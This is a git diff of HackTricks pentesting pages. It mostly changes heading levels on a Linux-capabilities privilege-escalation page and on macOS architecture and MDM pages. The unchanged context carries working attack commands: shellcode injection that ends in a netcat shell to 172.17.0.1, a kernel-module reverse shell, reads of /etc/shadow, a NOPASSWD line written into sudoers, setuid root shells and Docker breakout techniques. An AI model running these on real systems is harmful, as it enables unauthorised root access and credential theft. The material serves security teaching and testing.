4. **Modify** the **shellcode** inside the program and **compile** it `gcc inject.c -o inject`
|
||||
5. **Inject** it and grab your **shell**: `./inject 299; nc 172.17.0.1 5600`
|
||||
|
||||
#### Example with environment (Docker breakout) - Gdb Abuse
|
||||
**Example with environment (Docker breakout) - Gdb Abuse**
|
||||
|
||||
If **GDB** is installed (or you can install it with `apk add gdb` or `apt install gdb` for example) you can **debug a process from the host** and make it call the `system` function. (This technique also requires the capability `SYS_ADMIN`)**.**
|
||||
|
||||
|
@ -616,12 +615,12 @@ gdb -p 1234
|
|||
|
||||
You won’t be able to see the output of the command executed but it will be executed by that process (so get a rev shell).
|
||||
|
||||
### CAP\_SYS\_MODULE
|
||||
#### CAP\_SYS\_MODULE
|
||||
|
||||
[**CAP\_SYS\_MODULE**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows the process to load and unload arbitrary kernel modules (`init_module(2)`, `finit_module(2)` and `delete_module(2)` system calls). This could lead to trivial privilege escalation and ring-0 compromise. The kernel can be modified at will, subverting all system security, Linux Security Modules, and container systems.\
|
||||
**This means that you can** **insert/remove kernel modules in/from the kernel of the host machine.**
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
In the following example the binary **`python`** has this capability.
|
||||
|
||||
|
@ -653,7 +652,7 @@ km.set_mod_dir("/path/to/fake/lib/modules/5.0.0-20-generic/")
|
|||
km.modprobe("reverse-shell")
|
||||
```
|
||||
|
||||
#### Example 2 with binary
|
||||
**Example 2 with binary**
|
||||
|
||||
In the following example the binary **`kmod`** has this capability.
|
||||
|
||||
|
@ -664,7 +663,7 @@ getcap -r / 2>/dev/null
|
|||
|
||||
Which means that it's possible to use the command **`insmod`** to insert a kernel module. Follow the example below to get a **reverse shell** abusing this privilege.
|
||||
|
||||
#### Example with environment (Docker breakout)
|
||||
**Example with environment (Docker breakout)**
|
||||
|
||||
You can check the enabled capabilities inside the docker container using:
|
||||
|
||||
|
@ -750,12 +749,12 @@ insmod reverse-shell.ko #Launch the reverse shell
|
|||
|
||||
Another example of this technique can be found in [https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host](https://www.cyberark.com/resources/threat-research-blog/how-i-hacked-play-with-docker-and-remotely-ran-code-on-the-host)
|
||||
|
||||
### CAP\_DAC\_READ\_SEARCH
|
||||
#### CAP\_DAC\_READ\_SEARCH
|
||||
|
||||
[**CAP\_DAC\_READ\_SEARCH**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows a process to **bypass file read, and directory read and execute permissions**. While this was designed to be used for searching or reading files, it also grants the process permission to invoke `open_by_handle_at(2)`. Any process with the capability `CAP_DAC_READ_SEARCH` can use `open_by_handle_at(2)` to gain access to any file, even files outside their mount namespace. The handle passed into `open_by_handle_at(2)` is intended to be an opaque identifier retrieved using `name_to_handle_at(2)`. However, this handle contains sensitive and tamperable information, such as inode numbers. This was first shown to be an issue in Docker containers by Sebastian Krahmer with [shocker](https://medium.com/@fun\_cuddles/docker-breakout-exploit-analysis-a274fff0e6b3) exploit.\
|
||||
**This means that you can** **bypass can bypass file read permission checks and directory read/execute permission checks.**
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
The binary will be able to read any file. So, if a file like tar has this capability it will be able to read the shadow file:
|
||||
|
||||
|
@ -766,7 +765,7 @@ cd /tmp
|
|||
tar -cxf shadow.tar.gz
|
||||
```
|
||||
|
||||
#### Example with binary2
|
||||
**Example with binary2**
|
||||
|
||||
In this case lets suppose that **`python`** binary has this capability. In order to list root files you could do:
|
||||
|
||||
|
@ -783,7 +782,7 @@ And in order to read a file you could do:
|
|||
print(open("/etc/shadow", "r").read())
|
||||
```
|
||||
|
||||
#### Example in Environment (Docker breakout)
|
||||
**Example in Environment (Docker breakout)**
|
||||
|
||||
You can check the enabled capabilities inside the docker container using:
|
||||
|
||||
|
@ -960,17 +959,17 @@ int main(int argc,char* argv[] )
|
|||
I exploit needs to find a pointer to something mounted on the host. The original exploit used the file /.dockerinit and this modified version uses /etc/hostname. If the exploit isn't working maybe you need to set a different file. To find a file that is mounted in the host just execute mount command:
|
||||
{% endhint %}
|
||||
|
||||
![](<../../.gitbook/assets/image (407) (1).png>)
|
||||
![](<../../.gitbook/assets/image (407) (2).png>)
|
||||
|
||||
**The code of this technique was copied from the laboratory of "Abusing DAC\_READ\_SEARCH Capability" from** [**https://www.pentesteracademy.com/**](https://www.pentesteracademy.com)
|
||||
|
||||
### CAP\_DAC\_OVERRIDE
|
||||
#### CAP\_DAC\_OVERRIDE
|
||||
|
||||
**This mean that you can bypass write permission checks on any file, so you can write any file.**
|
||||
|
||||
There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges).
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
In this example vim has this capability, so you can modify any file like _passwd_, _sudoers_ or _shadow_:
|
||||
|
||||
|
@ -981,7 +980,7 @@ getcap -r / 2>/dev/null
|
|||
vim /etc/sudoers #To overwrite it
|
||||
```
|
||||
|
||||
#### Example with binary 2
|
||||
**Example with binary 2**
|
||||
|
||||
In this example **`python`** binary will have this capability. You could use python to override any file:
|
||||
|
||||
|
@ -991,7 +990,7 @@ file.write("yourusername ALL=(ALL) NOPASSWD:ALL")
|
|||
file.close()
|
||||
```
|
||||
|
||||
#### Example with environment + CAP\_DAC\_READ\_SEARCH (Docker breakout)
|
||||
**Example with environment + CAP\_DAC\_READ\_SEARCH (Docker breakout)**
|
||||
|
||||
You can check the enabled capabilities inside the docker container using:
|
||||
|
||||
|
@ -1154,11 +1153,11 @@ In order to scape the docker container you could **download** the files `/etc/sh
|
|||
|
||||
**The code of this technique was copied from the laboratory of "Abusing DAC\_OVERRIDE Capability" from** [**https://www.pentesteracademy.com**](https://www.pentesteracademy.com)
|
||||
|
||||
### CAP\_CHOWN
|
||||
#### CAP\_CHOWN
|
||||
|
||||
**This means that it's possible to change the ownership of any file.**
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
Lets suppose the **`python`** binary has this capability, you can **change** the **owner** of the **shadow** file, **change root password**, and escalate privileges:
|
||||
|
||||
|
@ -1172,11 +1171,11 @@ Or with the **`ruby`** binary having this capability:
|
|||
ruby -e 'require "fileutils"; FileUtils.chown(1000, 1000, "/etc/shadow")'
|
||||
```
|
||||
|
||||
### CAP\_FOWNER
|
||||
#### CAP\_FOWNER
|
||||
|
||||
**This means that it's possible to change the permission of any file.**
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
If python has this capability you can modify the permissions of the shadow file, **change root password**, and escalate privileges:
|
||||
|
||||
|
@ -1184,11 +1183,11 @@ If python has this capability you can modify the permissions of the shadow file,
|
|||
python -c 'import os;os.chmod("/etc/shadow",0666)
|
||||
```
|
||||
|
||||
### CAP\_SETUID
|
||||
#### CAP\_SETUID
|
||||
|
||||
**This means that it's possible to set the effective user id of the created process.**
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
If python has this **capability**, you can very easily abuse it to escalate privileges to root:
|
||||
|
||||
|
@ -1209,13 +1208,13 @@ os.setuid(0)
|
|||
os.system("/bin/bash")
|
||||
```
|
||||
|
||||
### CAP\_SETGID
|
||||
#### CAP\_SETGID
|
||||
|
||||
**This means that it's possible to set the effective group id of the created process.**
|
||||
|
||||
There are a lot of files you can **overwrite to escalate privileges,** [**you can get ideas from here**](payloads-to-execute.md#overwriting-a-file-to-escalate-privileges).
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
In this case you should look for interesting files that a group can read because you can impersonate any group:
|
||||
|
||||
|
@ -1244,11 +1243,11 @@ cat /etc/shadow
|
|||
|
||||
If **docker** is installed you could **impersonate** the **docker group** and abuse it to communicate with the [**docker socket** and escalate privileges](./#writable-docker-socket).
|
||||
|
||||
### CAP\_SETFCAP
|
||||
#### CAP\_SETFCAP
|
||||
|
||||
**This means that it's possible to set capabilities on files and processes**
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
If python has this **capability**, you can very easily abuse it to escalate privileges to root:
|
||||
|
||||
|
@ -1287,7 +1286,7 @@ Note that if you set a new capability to the binary with CAP\_SETFCAP, you will
|
|||
|
||||
Once you have [SETUID capability](linux-capabilities.md#cap\_setuid) you can go to its section to see how to escalate privileges.
|
||||
|
||||
#### Example with environment (Docker breakout)
|
||||
**Example with environment (Docker breakout)**
|
||||
|
||||
By default the capability **CAP\_SETFCAP is given to the proccess inside the container in Docker**. You can check that doing something like:
|
||||
|
||||
|
@ -1322,17 +1321,17 @@ However, Docker also grants the **CAP\_SETPCAP** by default, so you might be abl
|
|||
However, in the documentation of this cap: _CAP\_SETPCAP : \[…] **add any capability from the calling thread’s bounding** set to its inheritable set_.\
|
||||
It looks like we can only add to the inheritable set capabilities from the bounding set. Which means that **we cannot put new capabilities like CAP\_SYS\_ADMIN or CAP\_SYS\_PTRACE in the inherit set to escalate privileges**.
|
||||
|
||||
### CAP\_SYS\_RAWIO
|
||||
#### CAP\_SYS\_RAWIO
|
||||
|
||||
[**CAP\_SYS\_RAWIO**](https://man7.org/linux/man-pages/man7/capabilities.7.html) provides a number of sensitive operations including access to `/dev/mem`, `/dev/kmem` or `/proc/kcore`, modify `mmap_min_addr`, access `ioperm(2)` and `iopl(2)` system calls, and various disk commands. The `FIBMAP ioctl(2)` is also enabled via this capability, which has caused issues in the [past](http://lkml.iu.edu/hypermail/linux/kernel/9907.0/0132.html). As per the man page, this also allows the holder to descriptively `perform a range of device-specific operations on other devices`.
|
||||
|
||||
This can be useful for **privilege escalation** and **Docker breakout.**
|
||||
|
||||
### CAP\_KILL
|
||||
#### CAP\_KILL
|
||||
|
||||
**This means that it's possible to kill any process.** You cannot escalate privileges directly with this capability.
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
Lets suppose the **`python`** binary has this capability. If you could **also modify some service or socket configuration** (or any configuration file related to a service) file, you could backdoor it, and then kill the process related to that service and wait for the new configuration file to be executed with your backdoor.
|
||||
|
||||
|
@ -1344,11 +1343,11 @@ pgid = os.getpgid(341)
|
|||
os.killpg(pgid, signal.SIGKILL)
|
||||
```
|
||||
|
||||
### CAP\_NET\_BIND\_SERVICE
|
||||
#### CAP\_NET\_BIND\_SERVICE
|
||||
|
||||
**This means that it's possible to listen in any port (even in privileged ones).** You cannot escalate privileges directly with this capability.
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
If **`python`** has this capability it will be able to listen on any port and even connect from it to any other port (some services require connections from specific privileges ports)
|
||||
|
||||
|
@ -1376,13 +1375,13 @@ s.connect(('10.10.10.10',500))
|
|||
{% endtab %}
|
||||
{% endtabs %}
|
||||
|
||||
### CAP\_NET\_RAW
|
||||
#### CAP\_NET\_RAW
|
||||
|
||||
[**CAP\_NET\_RAW**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows a process to be able to **create RAW and PACKET socket types** for the available network namespaces. This allows arbitrary packet generation and transmission through the exposed network interfaces. In many cases this interface will be a virtual Ethernet device which may allow for a malicious or **compromised container** to **spoof** **packets** at various network layers. A malicious process or compromised container with this capability may inject into upstream bridge, exploit routing between containers, bypass network access controls, and otherwise tamper with host networking if a firewall is not in place to limit the packet types and contents. Finally, this capability allows the process to bind to any address within the available namespaces. This capability is often retained by privileged containers to allow ping to function by using RAW sockets to create ICMP requests from a container.
|
||||
|
||||
**This means that it's possible to sniff traffic.** You cannot escalate privileges directly with this capability.
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
If the binary **`tcpdump`** has this capability you will be able to use it to capture network information.
|
||||
|
||||
|
@ -1393,7 +1392,7 @@ getcap -r / 2>/dev/null
|
|||
|
||||
Note that if the **environment** is giving this capability you could also use **`tcpdump`** to sniff traffic.
|
||||
|
||||
#### Example with binary 2
|
||||
**Example with binary 2**
|
||||
|
||||
The following example is **`python2`** code that can be useful to intercept traffic of the "**lo**" (**localhost**) interface. The code is from the lab "_The Basics: CAP-NET\_BIND + NET\_RAW_" from [https://attackdefense.pentesteracademy.com/](https://attackdefense.pentesteracademy.com)
|
||||
|
||||
|
@ -1441,11 +1440,11 @@ while True:
|
|||
count=count+1
|
||||
```
|
||||
|
||||
### CAP\_NET\_ADMIN + CAP\_NET\_RAW
|
||||
#### CAP\_NET\_ADMIN + CAP\_NET\_RAW
|
||||
|
||||
[**CAP\_NET\_ADMIN**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows the capability holder to **modify the exposed network namespaces' firewall, routing tables, socket permissions**, network interface configuration and other related settings on exposed network interfaces. This also provides the ability to **enable promiscuous mode** for the attached network interfaces and potentially sniff across namespaces.
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
Lets suppose that the **python binary** has these capabilities.
|
||||
|
||||
|
@ -1461,11 +1460,11 @@ import iptc
|
|||
iptc.easy.flush_table('filter')
|
||||
```
|
||||
|
||||
### CAP\_LINUX\_IMMUTABLE
|
||||
#### CAP\_LINUX\_IMMUTABLE
|
||||
|
||||
**This means that it's possible modify inode attributes.** You cannot escalate privileges directly with this capability.
|
||||
|
||||
#### Example with binary
|
||||
**Example with binary**
|
||||
|
||||
If you find that a file is immutable and python has this capability, you can **remove the immutable attribute and make the file modifiable:**
|
||||
|
||||
|
@ -1501,20 +1500,20 @@ sudo chattr -i file.txt
|
|||
```
|
||||
{% endhint %}
|
||||
|
||||
### CAP\_SYS\_CHROOT
|
||||
#### CAP\_SYS\_CHROOT
|
||||
|
||||
[**CAP\_SYS\_CHROOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) permits the use of the `chroot(2)` system call. This may allow escaping of any `chroot(2)` environment, using known weaknesses and escapes:
|
||||
|
||||
* [How to break out from various chroot solutions](https://deepsec.net/docs/Slides/2015/Chw00t\_How\_To\_Break%20Out\_from\_Various\_Chroot\_Solutions\_-\_Bucsay\_Balazs.pdf)
|
||||
* [chw00t: chroot escape tool](https://github.com/earthquake/chw00t/)
|
||||
|
||||
### CAP\_SYS\_BOOT
|
||||
#### CAP\_SYS\_BOOT
|
||||
|
||||
[**CAP\_SYS\_BOOT**](https://man7.org/linux/man-pages/man7/capabilities.7.html) allows to use the `reboot(2)` syscall. It also allows for executing an arbitrary **reboot command** via `LINUX_REBOOT_CMD_RESTART2`, implemented for some specific hardware platforms.
|
||||
|
||||
This capability also permits use of the `kexec_load(2)` system call, which loads a new crash kernel and as of Linux 3.17, the `kexec_file_load(2)` which also will load signed kernels.
|
||||
|
||||
### CAP\_SYSLOG
|
||||
#### CAP\_SYSLOG
|
||||
|
||||
[CAP\_SYSLOG](https://man7.org/linux/man-pages/man7/capabilities.7.html) was finally forked in Linux 2.6.37 from the `CAP_SYS_ADMIN` catchall, this capability allows the process to use the `syslog(2)` system call. This also allows the process to view kernel addresses exposed via `/proc` and other interfaces when `/proc/sys/kernel/kptr_restrict` is set to 1.
|
||||
|
||||
|
@ -1522,7 +1521,7 @@ The `kptr_restrict` sysctl setting was introduced in 2.6.38, and determines if k
|
|||
|
||||
In addition, this capability also allows the process to view `dmesg` output, if the `dmesg_restrict` setting is 1. Finally, the `CAP_SYS_ADMIN` capability is still permitted to perform `syslog` operations itself for historical reasons.
|
||||
|
||||
## References
|
||||
### References
|
||||
|
||||
**Most of these examples were taken from some labs of** [**https://attackdefense.pentesteracademy.com/**](https://attackdefense.pentesteracademy.com), so if you want to practice this privesc techniques I recommend these labs.
|
||||
|
||||
|
@ -1534,7 +1533,6 @@ In addition, this capability also allows the process to view `dmesg` output, if
|
|||
* [https://www.linuxjournal.com/article/5737](https://www.linuxjournal.com/article/5737)
|
||||
* [https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module](https://0xn3va.gitbook.io/cheat-sheets/container/escaping/excessive-capabilities#cap\_sys\_module)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -1550,5 +1548,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# Mac OS Architecture
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,24 +16,23 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## Mac OS Architecture
|
||||
|
||||
# Mac OS Architecture
|
||||
### Kernel
|
||||
|
||||
## Kernel
|
||||
|
||||
### XNU
|
||||
#### XNU
|
||||
|
||||
The heart of Mac OS X is the **XNU kernel**. XNU is basically composed of a **Mach core** (covered in the next section) with supplementary features provided by Berkeley Software Distribution (**BSD**). Additionally, **XNU** is responsible for providing an **environment for kernel drivers called the I/O Kit**. **XNU is a Darwin package**, so all of the source **code** is **freely available**.
|
||||
|
||||
From a security researcher’s perspective, **Mac OS X feels just like a FreeBSD box with a pretty windowing system** and a large number of custom applications. For the most part, applications written for BSD will compile and run without modification on Mac OS X. All the tools you are accustomed to using in BSD are available in Mac OS X. Nevertheless, the fact that the **XNU kernel contains all the Mach code** means that some day, when you have to dig deeper, you’ll find many differences that may cause you problems and some you may be able to leverage for your own purposes.
|
||||
|
||||
### Mach
|
||||
#### Mach
|
||||
|
||||
Mach was originated as a UNIX-compatible **operating system** back in 1984. One of its primary design **goals** was to be a **microkernel**; that is, to **minimize** the amount of code running in the **kernel** and allow many typical kernel functions, such as file system, networking, and I/O, to **run as user-level** Mach tasks.
|
||||
|
||||
**In XNU, Mach is responsible for many of the low-level operations** you expect from a kernel, such as processor scheduling and multitasking and virtual- memory management.
|
||||
|
||||
### BSD
|
||||
#### BSD
|
||||
|
||||
The **kernel** also involves a large chunk of **code derived from the FreeBSD** code base. This code runs as part of the kernel along with Mach and uses the same address space. The F**reeBSD code within XNU may differ significantly from the original FreeBSD code**, as changes had to be made for it to coexist with Mach. FreeBSD provides many of the remaining operations the kernel needs, including:
|
||||
|
||||
|
@ -46,7 +45,7 @@ The **kernel** also involves a large chunk of **code derived from the FreeBSD**
|
|||
|
||||
To get an idea of just how complicated the interaction between these two sets of code can be, consider the idea of the fundamental executing unit. **In BSD the fundamental unit is the process. In Mach it is a Mach thread**. The disparity is settled by each BSD-style process being associated with a Mach task consisting of exactly one Mach thread. When the BSD fork() system call is made, the BSD code in the kernel uses Mach calls to create a task and thread structure. Also, it is important to note that both the Mach and BSD layers have different security models. The **Mach security** model is **based** **on** **port** **rights**, and the **BSD** model is based on **process** **ownership**. Disparities between these two models have resulted in a **number of local privilege-escalation vulnerabilities**. Additionally, besides typical system cells, there are Mach traps that allow user-space programs to communicate with the kernel.
|
||||
|
||||
### I/O Kit - Drivers
|
||||
#### I/O Kit - Drivers
|
||||
|
||||
I/O Kit is the open-source, object-oriented, **device-driver framework** in the XNU kernel and is responsible for the addition and management of **dynamically loaded device drivers**. These drivers allow for modular code to be added to the kernel dynamically for use with different hardware, for example. They are located in:
|
||||
|
||||
|
@ -89,13 +88,13 @@ kextload com.apple.iokit.IOReportFamily
|
|||
kextunload com.apple.iokit.IOReportFamily
|
||||
```
|
||||
|
||||
## Applications
|
||||
### Applications
|
||||
|
||||
A kernel without applications isn’t very useful. **Darwin** is the non-Aqua, **open-source core of Mac OS X**. Basically it is all the parts of Mac OS X for which the **source code is available**. The code is made available in the form of a **package that is easy to install**. There are hundreds of **available Darwin packages**, such as X11, GCC, and other GNU tools. Darwin provides many of the applications you may already use in BSD or Linux for Mac OS X. Apple has spent significant time **integrating these packages into their operating system** so that everything behaves nicely and has a consistent look and feel when possible.
|
||||
|
||||
On the **other** hand, many familiar pieces of Mac OS X are **not open source**. The main missing piece to someone running just the Darwin code will be **Aqua**, the **Mac OS X windowing and graphical-interface environment**. Additionally, most of the common **high-level applications**, such as Safari, Mail, QuickTime, iChat, etc., are not open source (although some of their components are open source). Interestingly, these closed-source applications often **rely on open- source software**, for example, Safari relies on the WebKit project for HTML and JavaScript rendering. **For perhaps this reason, you also typically have many more symbols in these applications when debugging than you would in a Windows environment.**
|
||||
|
||||
### **Universal binaries**
|
||||
#### **Universal binaries**
|
||||
|
||||
Mac OS binaries usually are compiled as universal binaries. A **universal binary** can **support multiple architectures in the same file**.
|
||||
|
||||
|
@ -114,11 +113,11 @@ gcc -arch ppc -arch i386 -o test-universal test.c
|
|||
|
||||
As you may be thinking usually a universal binary compiled for 2 architectures **doubles the size** of one compiled for just 1 arch.
|
||||
|
||||
### Mach-o Format
|
||||
#### Mach-o Format
|
||||
|
||||
![](<../../.gitbook/assets/image (559).png>)
|
||||
|
||||
#### **Header**
|
||||
**Header**
|
||||
|
||||
The header contains basic information about the file, such as magic bytes to identify it as a Mach-O file and information about the target architecture. You can find it in: `mdfind loader.h | grep -i mach-o | grep -E "loader.h$"`
|
||||
|
||||
|
@ -140,9 +139,9 @@ Filetypes:
|
|||
* MH\_DYLIB (0x6): A Mach-O dynamic linked library (i.e. .dylib)
|
||||
* MH\_BUNDLE (0x8): A Mach-O bundle (i.e. .bundle)
|
||||
|
||||
####
|
||||
|
||||
#### **Load commands**
|
||||
|
||||
**Load commands**
|
||||
|
||||
This specifies the **layout of the file in memory**. It contains the **location of the symbol table**, the main thread context at the beginning of execution, and which **shared libraries** are required.\
|
||||
The commands basically instruct the dynamic loader **(dyld) how to load the binary in memory.**
|
||||
|
@ -206,15 +205,15 @@ A Mach-O binary can contain one or **more** **constructors**, that will be **exe
|
|||
The offsets of any constructors are held in the **\_\_mod\_init\_func** section of the **\_\_DATA\_CONST** segment.
|
||||
{% endhint %}
|
||||
|
||||
####
|
||||
|
||||
#### **Data**
|
||||
|
||||
**Data**
|
||||
|
||||
The heart of the file is the final region, the data, which consists of a number of segments as laid out in the load-commands region. **Each segment can contain a number of data sections**. Each of these sections **contains code or data** of one particular type.
|
||||
|
||||
![](<../../.gitbook/assets/image (507) (3).png>)
|
||||
![](<../../.gitbook/assets/image (555).png>)
|
||||
|
||||
#### Get the info
|
||||
**Get the info**
|
||||
|
||||
```bash
|
||||
otool -f /bin/ls #Get universal headers info
|
||||
|
@ -225,7 +224,7 @@ otool -L /bin/ls #Get libraries used by the binary
|
|||
|
||||
Or you can use the GUI tool [**machoview**](https://sourceforge.net/projects/machoview/).
|
||||
|
||||
### Bundles
|
||||
#### Bundles
|
||||
|
||||
Basically, a bundle is a **directory structure** within the file system. Interestingly, by default this directory **looks like a single object in Finder**. The types of resources contained within a bundle may consist of applications, libraries, images, documentation, header files, etc. All these files are inside `<application>.app/Contents/`
|
||||
|
||||
|
@ -259,7 +258,7 @@ ls -lR /Applications/Safari.app/Contents
|
|||
|
||||
Contains the **oldest** **version** of **macOS** that the application is compatible with.
|
||||
|
||||
### Objective-C
|
||||
#### Objective-C
|
||||
|
||||
Programs written in Objective-C **retain** their class declarations **when** **compiled** into (Mach-O) binaries. Such class declarations **include** the name and type of:
|
||||
|
||||
|
@ -275,7 +274,7 @@ class-dump Kindle.app
|
|||
|
||||
Note that this names can be obfuscated to make the reversing of the binary more difficult.
|
||||
|
||||
### Native Packages
|
||||
#### Native Packages
|
||||
|
||||
There are some projects that allow to generate a binary executable by MacOS containing script code which will be executed. Some examples are:
|
||||
|
||||
|
@ -286,12 +285,11 @@ There are some projects that allow to generate a binary executable by MacOS cont
|
|||
* **Electron:** JavaScript, HTML, and CSS.
|
||||
* These binaries will use **Electron Framework.framework**. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in `.asar` files. These binaries will use Electron Framework.framework. Moreover, the non-binary components (e.g. JavaScript files) maybe found in the application’s **`Contents/Resources/`** directory, achieved in **`.asar` files**. It's possible **unpack** such archives via the **asar** node module, or the **npx** **utility:** `npx asar extract StrongBox.app/Contents/Resources/app.asar appUnpacked`\\
|
||||
|
||||
## References
|
||||
### References
|
||||
|
||||
* [**The Mac Hacker's Handbook**](https://www.amazon.com/-/es/Charlie-Miller-ebook-dp-B004U7MUMU/dp/B004U7MUMU/ref=mt\_other?\_encoding=UTF8\&me=\&qid=)
|
||||
* [**https://taomm.org/vol1/analysis.html**](https://taomm.org/vol1/analysis.html)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||||
|
@ -307,5 +305,3 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
**Share your hacking tricks submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
@ -1,4 +1,4 @@
|
|||
|
||||
# MacOS MDM
|
||||
|
||||
<details>
|
||||
|
||||
|
@ -16,12 +16,11 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
|
||||
</details>
|
||||
|
||||
## MacOS MDM
|
||||
|
||||
# MacOS MDM
|
||||
### Basics
|
||||
|
||||
## Basics
|
||||
|
||||
### What is MDM (Mobile Device Management)?
|
||||
#### What is MDM (Mobile Device Management)?
|
||||
|
||||
[Mobile Device Management](https://en.wikipedia.org/wiki/Mobile\_device\_management) (MDM) is a technology commonly used to **administer end-user computing devices** such as mobile phones, laptops, desktops and tablets. In the case of Apple platforms like iOS, macOS and tvOS, it refers to a specific set of features, APIs and techniques used by administrators to manage these devices. Management of devices via MDM requires a compatible commercial or open-source MDM server that implements support for the [MDM Protocol](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf).
|
||||
|
||||
|
@ -29,7 +28,7 @@ Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
|||
* Requires an **MDM server** which implements support for the MDM protocol
|
||||
* MDM server can **send MDM commands**, such as remote wipe or “install this config”
|
||||
|
||||
### Basics What is DEP (Device Enrolment Program)?
|
||||
#### Basics What is DEP (Device Enrolment Program)?
|
||||
|
||||
The [Device Enrollment Program](https://www.apple.com/business/site/docs/DEP\_Guide.pdf) (DEP) is a service offered by Apple that **simplifies** Mobile Device Management (MDM) **enrollment** by offering **zero-touch configuration** of iOS, macOS, and tvOS devices. Unlike more traditional deployment methods, which require the end-user or administrator to take action to configure a device, or manually enroll with an MDM server, DEP aims to bootstrap this process, **allowing the user to unbox a new Apple device and have it configured for use in the organization almost immediately**.
|
||||
|
||||
|
@ -43,21 +42,21 @@ Administrators can leverage DEP to automatically enroll devices in their organiz
|
|||
Unfortunately, if an organization has not taken additional steps to **protect their MDM enrollment**, a simplified end-user enrollment process through DEP can also mean a simplified process for **attackers to enroll a device of their choosing in the organization’s MDM** server, assuming the "identity" of a corporate device.
|
||||
{% endhint %}
|
||||
|
||||
### Basics What is SCEP (Simple Certificate Enrolment Protocol)?
|
||||
#### Basics What is SCEP (Simple Certificate Enrolment Protocol)?
|
||||
|
||||
* A relatively old protocol, created before TLS and HTTPS were widespread.
|
||||
* Gives clients a standardized way of sending a **Certificate Signing Request** (CSR) for the purpose of being granted a certificate. The client will ask the server to give him a signed certificate.
|
||||
|
||||
### What are Configuration Profiles (aka mobileconfigs)?
|
||||
#### What are Configuration Profiles (aka mobileconfigs)?
|
||||
|
||||
* Apple’s official way of **setting/enforcing system configuration.**
|
||||
* File format that can contain multiple payloads.
|
||||
* Based on property lists (the XML kind).
|
||||
* “can be signed and encrypted to validate their origin, ensure their integrity, and protect their contents.” Basics — Page 70, iOS Security Guide, January 2018.
|
||||
|
||||
## Protocols
|
||||
### Protocols
|
||||
|
||||
### MDM
|
||||
#### MDM
|
||||
|
||||
* Combination of APNs (**Apple server**s) + RESTful API (**MDM** **vendor** servers)
|
||||
* **Communication** occurs between a **device** and a server associated with a **device** **management** **product**
|
||||
|
@ -65,7 +64,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
|
|||
* All over **HTTPS**. MDM servers can be (and are usually) pinned.
|
||||
* Apple grants the MDM vendor an **APNs certificate** for authentication
|
||||
|
||||
### DEP
|
||||
#### DEP
|
||||
|
||||
* **3 APIs**: 1 for resellers, 1 for MDM vendors, 1 for device identity (undocumented):
|
||||
* The so-called [DEP "cloud service" API](https://developer.apple.com/enterprise/documentation/MDM-Protocol-Reference.pdf). This is used by MDM servers to associate DEP profiles with specific devices.
|
||||
|
@ -74,7 +73,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
|
|||
* More modern and **JSON** based (vs. plist)
|
||||
* Apple grants an **OAuth token** to the MDM vendor
|
||||
|
||||
#### DEP "cloud service" API
|
||||
**DEP "cloud service" API**
|
||||
|
||||
* RESTful
|
||||
* sync device records from Apple to the MDM server
|
||||
|
@ -84,7 +83,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
|
|||
* Additional trusted certificates for server URL (optional pinning)
|
||||
* Extra settings (e.g. which screens to skip in Setup Assistant)
|
||||
|
||||
## Steps for enrolment and management
|
||||
### Steps for enrolment and management
|
||||
|
||||
1. Device record creation (Reseller, Apple): The record for the new device is created
|
||||
2. Device record assignment (Customer): The device is assigned to a MDM server
|
||||
|
@ -98,7 +97,7 @@ Unfortunately, if an organization has not taken additional steps to **protect th
|
|||
|
||||
The file `/Library/Developer/CommandLineTools/SDKs/MacOSX10.15.sdk/System/Library/PrivateFrameworks/ConfigurationProfiles.framework/ConfigurationProfiles.tbd` exports functions that can be considered **high-level "steps"** of the enrolment process.
|
||||
|
||||
### Step 4: DEP check-in - Getting the Activation Record
|
||||
#### Step 4: DEP check-in - Getting the Activation Record
|
||||
|
||||
